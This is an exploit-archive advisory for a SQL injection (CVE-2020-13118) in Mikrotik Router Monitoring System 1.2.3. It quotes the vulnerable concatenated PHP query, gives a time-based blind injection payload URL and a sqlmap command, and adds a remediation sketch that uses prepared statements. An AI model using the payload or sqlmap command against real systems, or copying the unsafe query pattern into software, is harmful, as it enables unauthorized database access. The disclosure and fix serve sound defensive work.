ID: 1337DAY-ID-34438
History: May 19, 2020 - 12:00 a.m.

Mikrotik Router Monitoring System 1.2.3 - (community) SQL Injection Vulnerability

2020-05-19 00:00:00
jul10l1r4
0day.today

EPSS: 0.028 (Low), percentile 90.7%

Exploit for hardware platform in category web applications

# Exploit Title: Mikrotik Router Monitoring System 1.2.3 - 'community' SQL Injection
# Exploit Author: jul10l1r4 (Julio Lira)
# Vendor Homepage: https://mikrotik.com
# Software Link: https://mikrotik.com/download
# Version: <= 1.2.3
# Tested on: Debian 10 buster
# CVE: 2020-13118
Description: SQL Injection found in check_community.php:49

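// Request parameter is read without any validation
$community = $_GET['community'];
$_SESSION['community'] = $community;
// ...and concatenated directly into the SQL string
$query = "SELECT name from router where `community`='$community'";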

PoC:

http://localhost/check_community.php?community=1' AND (SELECT 6941 FROM (SELECT(SLEEP(10)))Qaxg) AND 'sdHI'='sdHI

Using sqlmap:
sqlmap -u 'http://localhost/check_community.php?community=1' --level=5 --risk=3

#  0day.today [2020-07-19]  #
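
Remediation sketch for the query shown above, as an added example that is not code from the advisory or from the project: the `community` value is validated against an allow-list and then bound as a parameter instead of being concatenated. Assumptions: PDO is available, an in-memory SQLite table stands in for the application's MySQL `router` table, and `lookup_router()` and the sample rows are hypothetical.

```php
<?php
// Added example. lookup_router() is a hypothetical helper, not part of the project.

function lookup_router(PDO $db, string $community, bool $validate = true): array
{
    // SNMP community strings are short printable tokens. The allow-list below
    // is an assumption; adjust it to the values the deployment really uses.
    if ($validate && !preg_match('/\A[A-Za-z0-9_.\-]{1,64}\z/', $community)) {
        return [];
    }
    // The value is bound, never concatenated, so quotes in the input cannot
    // change the structure of the statement.
    $stmt = $db->prepare('SELECT name FROM router WHERE `community` = :community');
    $stmt->execute([':community' => $community]);
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// Constructed sample data; SQLite stands in for MySQL so the script runs offline.
// Against MySQL, also set PDO::ATTR_EMULATE_PREPARES to false so the server
// prepares the statement itself.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE router (name TEXT, community TEXT)');
$db->exec("INSERT INTO router VALUES ('core-rtr', 'public'), ('edge-rtr', 'lab_ro')");

// The value from the PoC on this page, used here only as a test input.
$poc = "1' AND (SELECT 6941 FROM (SELECT(SLEEP(10)))Qaxg) AND 'sdHI'='sdHI";

$cases = [
    ['legitimate value',           'public', true],
    ['PoC value, allow-list on',   $poc,     true],
    // Even with validation skipped, binding treats the whole string as data:
    // it is compared literally to the column and matches no row.
    ['PoC value, binding only',    $poc,     false],
];
foreach ($cases as [$label, $input, $validate]) {
    $rows = lookup_router($db, $input, $validate);
    printf("%-26s => %s\n", $label, json_encode($rows));
}
```

The same binding applies wherever else the application reads `$_SESSION['community']` back into a query, since the session copy holds the unvalidated request value.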
